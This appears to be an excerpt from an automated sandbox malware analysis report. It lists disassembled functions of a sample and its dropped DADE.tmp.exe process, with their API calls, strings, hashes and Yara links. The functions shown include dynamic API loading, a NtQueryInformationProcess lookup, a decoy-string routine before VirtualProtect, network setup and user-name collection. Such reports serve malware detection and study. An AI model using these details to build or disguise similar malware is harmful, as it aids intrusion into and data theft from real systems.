Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
__CxxThrowException@8.LIBVCRUNTIME ref: 004212E9

Strings

pThreadProxy, xrefs: 004212D3

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pThreadProxy
API String ID: 1687795959-3651400591
Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC

Function 0042AE8A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
GetLastError.KERNEL32 ref: 0042AF2E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

Function 024AB0F1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02482AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02482AAD,00000000), ref: 024AB187
GetLastError.KERNEL32 ref: 024AB195
MultiByteToWideChar.KERNEL32(?,00000001,?,?,02482AAD,00000000), ref: 024AB1F0

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction ID: bf93f079a537c6fe2134ac975e89092c4dfc72e2da7a6cff801ae4eda88185ba
Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction Fuzzy Hash: E9410732600246AFDB218F65CC687BF7BB5EF71758F14426BEC599B2A0DB308901CB60

Analysis Process: DADE.tmp.exePID: 564, Parent PID: 3076COMMON

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	7%
Signature Coverage:	15.9%
Total number of Nodes:	1533
Total number of Limit Nodes:	37

Executed Functions

Function 00406000 Relevance: 123.3, APIs: 68, Strings: 2, Instructions: 817stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0040602F
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406082
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004060B5
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004060E5
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406120
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406153
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406163

Strings

", xrefs: 004065C7, 004066B5
------, xrefs: 00406289, 004062B6, 0040652E, 0040661F

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------
API String ID: 2041821634-2370822465
Opcode ID: 98aa613e604a5db2daeae4e8514d52f2f53726565d8e30286c0dd60e41fea8cd
Instruction ID: 2125bc0cde9220f82915efd50208f228c039266d2a321542d2fdd7d2ceb0accf
Opcode Fuzzy Hash: 98aa613e604a5db2daeae4e8514d52f2f53726565d8e30286c0dd60e41fea8cd
Instruction Fuzzy Hash: FE525E71A006159BDB20AFB5DD89B9F77B5AF04304F15503AF905B72E1DB78DC028BA8

Function 00404B80 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00404BAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C02
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C35
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C65
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404CA3
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404CD6
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404CE6

Strings

", xrefs: 00405154, 00405242
------, xrefs: 00404E0C, 00404E39, 004050BB, 004051AC

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------
API String ID: 2041821634-2370822465
Opcode ID: 49ea093db890fc0322da265671638fee748496652ec839826222a43dfbee2ef2
Instruction ID: ee9b337c920fa440a166249251ede5a47d7364bfc35f9bc5310ef1df1bec01ed
Opcode Fuzzy Hash: 49ea093db890fc0322da265671638fee748496652ec839826222a43dfbee2ef2
Instruction Fuzzy Hash: C5526E71A006169BDB10AFA5DC49B9F7BB5AF44304F14503AF904B72A1DB78ED42CBE8

Function 00404980 Relevance: 61.4, APIs: 34, Strings: 1, Instructions: 115
stringmemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404994
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040499B
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049A2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049A9
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049B0
GetProcessHeap.KERNEL32(00000000,?), ref: 004049BB
RtlAllocateHeap.NTDLL(00000000), ref: 004049C2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049D2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049D9
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049E0
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049E7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049EE
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049F9
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A00
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A07
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A0E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A15
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A2B
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A32
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A39
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A40
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A47
LdrInitializeThunk.NTDLL ref: 00404A4F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A73
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A7A
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A81
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A88
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A8F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A9F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AA6
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AAD
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AB4
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404ABB
VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00404AD0

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040498F, 00404996, 0040499D, 004049A4, 004049AB, 004049CA, 004049D4, 004049DB, 004049E2, 004049E9, 004049F0, 004049FB, 00404A02, 00404A09, 00404A10, 00404A26, 00404A2D, 00404A34, 00404A3B, 00404A42, 00404A63, 00404A75, 00404A7C, 00404A83, 00404A8A, 00404A9A, 00404AA1, 00404AA8, 00404AAF, 00404AB6

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateInitializeProcessProtectThunkVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2971326882-3329630956
Opcode ID: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
Instruction ID: 31bf12c2d79e338fb7f97826348345d32b3aa4c96b478bc01bd0f7d9a8ca19b4
Opcode Fuzzy Hash: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
Instruction Fuzzy Hash: F531E920F4823C7F86206BA56C45BDFBED4DF8E750F389053F51855184C9A864058EE9

Function 004263C0 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(77190000,00A579F0), ref: 00426419
GetProcAddress.KERNEL32(77190000,00A579C0), ref: 00426432
GetProcAddress.KERNEL32(77190000,00A57A68), ref: 0042644A
GetProcAddress.KERNEL32(77190000,00A579D8), ref: 00426462
GetProcAddress.KERNEL32(77190000,00A76940), ref: 0042647B
GetProcAddress.KERNEL32(77190000,00A55FF8), ref: 00426493
GetProcAddress.KERNEL32(77190000,00A56058), ref: 004264AB
GetProcAddress.KERNEL32(77190000,00A57A20), ref: 004264C4
GetProcAddress.KERNEL32(77190000,00A57A38), ref: 004264DC
GetProcAddress.KERNEL32(77190000,00A57A50), ref: 004264F4
GetProcAddress.KERNEL32(77190000,00A76C28), ref: 0042650D
GetProcAddress.KERNEL32(77190000,00A55F38), ref: 00426525
GetProcAddress.KERNEL32(77190000,00A76CB8), ref: 0042653D
GetProcAddress.KERNEL32(77190000,00A76DC0), ref: 00426556
GetProcAddress.KERNEL32(77190000,00A55F98), ref: 0042656E
GetProcAddress.KERNEL32(77190000,00A76C88), ref: 00426586
GetProcAddress.KERNEL32(77190000,00A76B80), ref: 0042659F
GetProcAddress.KERNEL32(77190000,00A56258), ref: 004265B7
GetProcAddress.KERNEL32(77190000,00A76E20), ref: 004265CF
GetProcAddress.KERNEL32(77190000,00A55EF8), ref: 004265E8
LoadLibraryA.KERNEL32(00A76D30,?,?,?,00421BE3), ref: 004265F9
LoadLibraryA.KERNEL32(00A76E08,?,?,?,00421BE3), ref: 0042660B
LoadLibraryA.KERNEL32(00A76D48,?,?,?,00421BE3), ref: 0042661D
LoadLibraryA.KERNEL32(00A76DD8,?,?,?,00421BE3), ref: 0042662E
LoadLibraryA.KERNEL32(00A76BC8,?,?,?,00421BE3), ref: 00426640
GetProcAddress.KERNEL32(76850000,00A76BE0), ref: 0042665D
GetProcAddress.KERNEL32(77040000,00A76DF0), ref: 00426679
GetProcAddress.KERNEL32(77040000,00A76BF8), ref: 00426691
GetProcAddress.KERNEL32(75A10000,00A76B38), ref: 004266AD
GetProcAddress.KERNEL32(75690000,00A56118), ref: 004266C9
GetProcAddress.KERNEL32(776F0000,00A769C0), ref: 004266E5
GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 004266FC

Strings

NtQueryInformationProcess, xrefs: 004266F1

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
Instruction ID: 7b5cedaa0e73423a59cdd3f572970276683dffd84f65f372ce21167b4aa31ce5
Opcode Fuzzy Hash: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
Instruction Fuzzy Hash: E0A16DB9A117009FD758DF65EE88A6637BBF789344300A51EF94683364DBB4A900DFB0

Function 004229E0 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00422A0F
HeapAlloc.KERNEL32(00000000), ref: 00422A16
GetUserNameA.ADVAPI32(00000000,00000104), ref: 00422A2A

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 8d99d318415601690ae838a51b87a7364d012be2201e373feb9efb6fa8a950a4
Instruction ID: aa6ded6259508bede27090f4c861d2ca31da26e1ef70df7e495680ac72f078f7
Opcode Fuzzy Hash: 8d99d318415601690ae838a51b87a7364d012be2201e373feb9efb6fa8a950a4
Instruction Fuzzy Hash: 95F054B1A44614AFD710DF98DD49B9ABBBCF744B65F10021AF915E3680D7B419048BE1

Function 00426710 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(77190000,00A56018), ref: 00426725
GetProcAddress.KERNEL32(77190000,00A561D8), ref: 0042673D
GetProcAddress.KERNEL32(77190000,00A76CE8), ref: 00426756
GetProcAddress.KERNEL32(77190000,00A76EC8), ref: 0042676E
GetProcAddress.KERNEL32(77190000,00A76E38), ref: 00426786
GetProcAddress.KERNEL32(77190000,00A76EF8), ref: 0042679F
GetProcAddress.KERNEL32(77190000,00A78B58), ref: 004267B7
GetProcAddress.KERNEL32(77190000,00A76E50), ref: 004267CF
GetProcAddress.KERNEL32(77190000,00A76E98), ref: 004267E8
GetProcAddress.KERNEL32(77190000,00A76E68), ref: 00426800
GetProcAddress.KERNEL32(77190000,00A76EB0), ref: 00426818
GetProcAddress.KERNEL32(77190000,00A56098), ref: 00426831
GetProcAddress.KERNEL32(77190000,00A56238), ref: 00426849
GetProcAddress.KERNEL32(77190000,00A56038), ref: 00426861
GetProcAddress.KERNEL32(77190000,00A56078), ref: 0042687A
GetProcAddress.KERNEL32(77190000,00A76E80), ref: 00426892
GetProcAddress.KERNEL32(77190000,00A76EE0), ref: 004268AA
GetProcAddress.KERNEL32(77190000,00A78DB0), ref: 004268C3
GetProcAddress.KERNEL32(77190000,00A56218), ref: 004268DB
GetProcAddress.KERNEL32(77190000,00A7DD08), ref: 004268F3
GetProcAddress.KERNEL32(77190000,00A7DC30), ref: 0042690C
GetProcAddress.KERNEL32(77190000,00A7DBE8), ref: 00426924
GetProcAddress.KERNEL32(77190000,00A7DC90), ref: 0042693C
GetProcAddress.KERNEL32(77190000,00A560B8), ref: 00426955
GetProcAddress.KERNEL32(77190000,00A7DDB0), ref: 0042696D
GetProcAddress.KERNEL32(77190000,00A7DD80), ref: 00426985
GetProcAddress.KERNEL32(77190000,00A7DE28), ref: 0042699E
GetProcAddress.KERNEL32(77190000,00A7DCC0), ref: 004269B6
GetProcAddress.KERNEL32(77190000,00A7DDF8), ref: 004269CE
GetProcAddress.KERNEL32(77190000,00A7DD98), ref: 004269E7
GetProcAddress.KERNEL32(77190000,00A7DCF0), ref: 004269FF
GetProcAddress.KERNEL32(77190000,00A7DC48), ref: 00426A17
GetProcAddress.KERNEL32(77190000,00A7DE40), ref: 00426A30
GetProcAddress.KERNEL32(77190000,00A79570), ref: 00426A48
GetProcAddress.KERNEL32(77190000,00A7DCD8), ref: 00426A60
GetProcAddress.KERNEL32(77190000,00A7DD50), ref: 00426A79
GetProcAddress.KERNEL32(77190000,00A560D8), ref: 00426A91
GetProcAddress.KERNEL32(77190000,00A7DE58), ref: 00426AA9
GetProcAddress.KERNEL32(77190000,00A560F8), ref: 00426AC2
GetProcAddress.KERNEL32(77190000,00A7DE88), ref: 00426ADA
GetProcAddress.KERNEL32(77190000,00A7DCA8), ref: 00426AF2
GetProcAddress.KERNEL32(77190000,00A56138), ref: 00426B0B
GetProcAddress.KERNEL32(77190000,00A56158), ref: 00426B23
LoadLibraryA.KERNEL32(00A7DC78,0042067A), ref: 00426B35
LoadLibraryA.KERNEL32(00A7DE10), ref: 00426B46
LoadLibraryA.KERNEL32(00A7DD20), ref: 00426B58
LoadLibraryA.KERNEL32(00A7DE70), ref: 00426B6A
